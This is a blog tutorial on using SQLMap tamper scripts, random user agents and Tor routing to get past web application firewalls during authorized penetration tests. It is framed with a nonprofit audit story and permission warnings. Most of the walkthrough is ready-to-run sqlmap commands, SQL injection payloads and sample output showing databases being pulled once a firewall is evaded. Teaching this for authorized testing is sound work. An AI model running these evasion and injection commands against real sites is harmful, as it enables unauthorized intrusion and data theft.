Ethical hackers don’t break Web Application Firewalls—they learn from them, then teach others how.
The Day I Hit a Digital Wall
Not long ago, I was helping a grassroots nonprofit audit their web infrastructure. They didn’t have the budget for enterprise security tools—just open-source software, an outdated CMS, and me.
Everything was running smoothly until we hit a wall. Not a metaphorical one—a literal Web Application Firewall that stopped our vulnerability scans cold.
It was my first real encounter with a hardened WAF, and I was stumped. But as a FOSS advocate, I knew there had to be a free, transparent way through. That’s when I turned to SQLMap tamper scripts, not as a weapon—but as a lens. What followed was a deep dive into the subtle mechanics of WAF bypassing and the ethical implications of knowing how to look where most can’t.
This article unpacks that journey—how I used open-source tools to simulate attacker behavior, pinpoint WAF blind spots, and report everything responsibly. If you’re a curious mind, an ethical hacker, or just someone who wants to understand how web defenses actually break—read on.
⚠️ Important: These tools are intended for ethical hacking, security research, and education. Use them only on systems and networks you own or have permission to test. Unauthorized use can lead to serious legal consequences.
- The Day I Hit a Digital Wall
- What Are Web Application Firewalls, Really?
- What Tamper Scripts Actually Do (and Why It Matters)
- From Blocked to Bypassed: A Real-World WAF Walkthrough
- Setting Up for SQLMap and Tamper Script Deployment
- Bypassing WAF with SQLmap: Step-by-Step
- Ethical Hacking Isn’t Just Tech—It’s Trust
What Are Web Application Firewalls, Really?
Most beginner hackers hear “WAF” and think of it as an invisible wall—but it’s more like an overzealous bouncer checking IDs at the door. Web Application Firewalls (WAFs) inspect traffic between the client and the server, looking for known patterns of attacks like SQL injection, XSS, or directory traversal. Their job is to block anything that seems malicious—whether it actually is or not.
From a security testing standpoint, WAFs often stand in the way of discovering real vulnerabilities because they block “bad-looking” input, even during authorized pen tests. Ethical hackers use tools like SQLMap with tamper scripts to simulate what malicious payloads might look like after evading detection—strictly in a controlled, consensual environment.
· · ─ ·𖥸· ─ · ·
What Tamper Scripts Actually Do (and Why It Matters)
Tamper scripts aren’t brute force tools—they’re sleight-of-hand artists. Each script rewrites SQLMap’s payloads to evade detection while preserving the core logic of the injection. Some add comments, others encode characters, randomize cases, or break up keywords with inline expressions.
Here’s what a typical tamper script might do:
- Turn
SELECTintoSeLeCt - Encode
' OR '1'='1into its hex equivalent - Add inline comments like
/**/to disrupt pattern matching
This doesn’t just fool basic filters—it reveals whether the WAF is relying on signatures, regex patterns, or deeper contextual logic. Ethical hackers analyze which tamper scripts work against which WAFs, providing valuable feedback to both developers and defenders.
· · ─ ·𖥸· ─ · ·
From Blocked to Bypassed: A Real-World WAF Walkthrough
Let’s say you’re testing a small e-commerce site protected by ModSecurity, one of the most widely used open-source Web Application Firewalls. You have permission, a clear scope, and you’re using SQLMap to test for injection vulnerabilities in the site’s product search feature.
Step 1: The Initial Request — Blocked
You fire off a simple test:
sqlmap -u "https://example.com/search.php?q=shirts" --batch --level=3 --risk=2SQLMap appends test payloads like:
' OR 1=1-- -But ModSecurity sees the classic ' OR 1=1 and instantly throws a 403 Forbidden, logging it as a possible SQL injection attempt. Game over—at least, if you’re not using tamper scripts.
Step 2: Adding a Tamper Script — Bypassed
You reload SQLMap with a tamper script like randomcase.py:
sqlmap -u "https://example.com/search.php?q=shirts" --tamper=randomcase --batch --level=3 --risk=2This script randomizes the case of SQL keywords, turning SELECT into sElEcT, OR into Or, and so on.
Why it works: Many WAFs use pattern matching that’s case-sensitive or inflexible. The tampered payload flies under the radar, and now SQLMap detects a vulnerable parameter. ModSecurity logs show nothing unusual—because the pattern it was trained to block no longer matches.
· · ─ ·𖥸· ─ · ·
Setting Up for SQLMap and Tamper Script Deployment
Before diving into bypass techniques, you’ll need a working environment that supports SQLMap and its powerful tamper scripts. Whether you’re using Termux on Android, Kali Linux on a dedicated machine, or a custom FOSS-friendly setup, it’s critical to prepare your tools thoughtfully. From installing SQLMap to ensuring your Python dependencies are clean and up-to-date, this step lays the foundation for everything that follows. In ethical hacking, a misconfigured environment can lead to false positives—or worse, wasted time. Let’s make sure you’re running lean, fast, and ready to test responsibly.
Prerequisites
Termux installed: Download Termux.
SQLmap installed:
pkg install python pip install sqlmapA target web application: Ensure you have permission to test the system.
Proxy tool (e.g., Burp Suite): For analyzing blocked requests.
Optional: Tor Network: Configure Tor for anonymous SQLmap testing.
· · ─ ·𖥸· ─ · ·
Bypassing WAF with SQLmap: Step-by-Step
Initial SQL Injection Test
Begin by checking if the target is vulnerable to SQL injection.
Command:
sqlmap -u "http://target.com/page?id=1"Sample Output:
[21:01:15] [INFO] checking if the target is protected by some kind of WAF/IPS/IDS
[21:01:15] [WARNING] WAF detected! Request blocked.
[21:01:16] [ERROR] all tested parameters appear to be not injectable. Explanation:
This output shows that the request was blocked by the WAF. SQLmap detected that the target is protected, meaning you need to use advanced techniques to bypass the WAF.
Using SQLmap to Bypass WAF
1. Random User-Agent Header
Some WAFs block requests based on the User-Agent string. Use SQLmap’s --random-agent option to evade this.
Command:
sqlmap -u "http://target.com/page?id=1" --random-agentSample Output:
[21:05:23] [INFO] using a randomly selected HTTP User-Agent
[21:05:24] [INFO] GET parameter 'id' appears to be injectable.
[21:05:25] [INFO] available databases:
[*] target_dbExplanation:
Using a random User-Agent header tricked the WAF, allowing SQLmap to proceed with the injection.
2. Tamper Scripts for Obfuscation
SQLmap offers tamper scripts that modify payloads to bypass WAF rules. For example, the between script introduces encoded elements to evade detection.
Command:
sqlmap -u "http://target.com/page?id=1" --tamper=betweenSample Output:
[21:10:16] [INFO] GET parameter 'id' appears to be injectable.
[21:10:17] [INFO] fetched data:
Database: target_db
[1 table found]
+-------+
| users |
+-------+Explanation:
The tamper script successfully encoded the payload, bypassing the WAF and retrieving data.
3. Hex Encoding Payloads
Hex encoding transforms SQL queries into hexadecimal format, confusing WAFs that don’t decode payloads.
Command:
sqlmap -u "http://target.com/page?id=1" --tamper=hexencodeSample Output:
[21:15:43] [INFO] GET parameter 'id' appears to be injectable.
Database: target_db
[2 tables found]
+---------+
| users |
| orders |
+---------+Explanation:
By sending hex-encoded payloads, SQLmap bypassed the WAF filters and extracted data from the database.
4. Case Manipulation to Evade WAF
Some WAFs rely on case-sensitive keyword detection. SQLmap offers case manipulation options through tamper scripts.
Command:
sqlmap -u "http://target.com/page?id=1" --tamper=uppercaseSample Output:
[21:20:12] [INFO] found database: target_dbExplanation:
The WAF’s filtering rules didn’t account for case changes, allowing the payload to bypass detection.
SQLmap with Proxy Tools for WAF Analysis
Use a proxy such as Burp Suite to inspect blocked requests and adjust SQLmap payloads accordingly.
Command:
sqlmap -u "http://target.com/page?id=1" --proxy="http://127.0.0.1:8080"Sample Output:
[21:25:46] [INFO] routing traffic through http://127.0.0.1:8080
[21:25:50] [INFO] GET parameter 'id' appears to be injectable. Explanation:
A proxy helps you analyze the WAF’s behavior and fine-tune your SQLmap commands for better evasion.
Anonymizing SQLmap Requests with Tor
To avoid IP-based blocking by WAFs, route SQLmap traffic through the Tor network.
Command:
sqlmap -u "http://target.com/page?id=1" --tor --tor-type=SOCKS5 --check-torSample Output:
[21:30:33] [INFO] Tor connection confirmed
[21:30:35] [INFO] GET parameter 'id' appears to be injectable. Explanation:
Using Tor hides your real IP address and helps bypass IP-based WAF restrictions.
Extracting Data After Bypassing WAF
Once the WAF is bypassed, you can extract data from the database using SQLmap.
Command:
sqlmap -u "http://target.com/page?id=1" --dbsSample Output:
[21:35:10] [INFO] available databases:
[*] information_schema
[*] target_db · · ─ ·𖥸· ─ · ·
Ethical Hacking Isn’t Just Tech—It’s Trust
Web Application Firewalls aren’t your enemy—they’re an opportunity to sharpen your understanding of modern web defense. This walkthrough using SQLMap tamper scripts wasn’t about breaking barriers for fun; it was about responsibly stress-testing the limits of FOSS-friendly security setups. Along the way, we’ve explored how web apps try to protect themselves, how attackers try to get around those protections—and how ethical hackers stand in between.
Want more grounded, hands-on guides like this? Subscribe to my newsletter at samgalope.dev/newsletter for weekly deep dives into real-world ethical hacking, open-source tooling, and the kind of digital literacy that empowers communities—not exploits them.
⚠️ Important: These tools are intended for ethical hacking, security research, and education. Use them only on systems and networks you own or have permission to test. Unauthorized use can lead to serious legal consequences.
Leave a Reply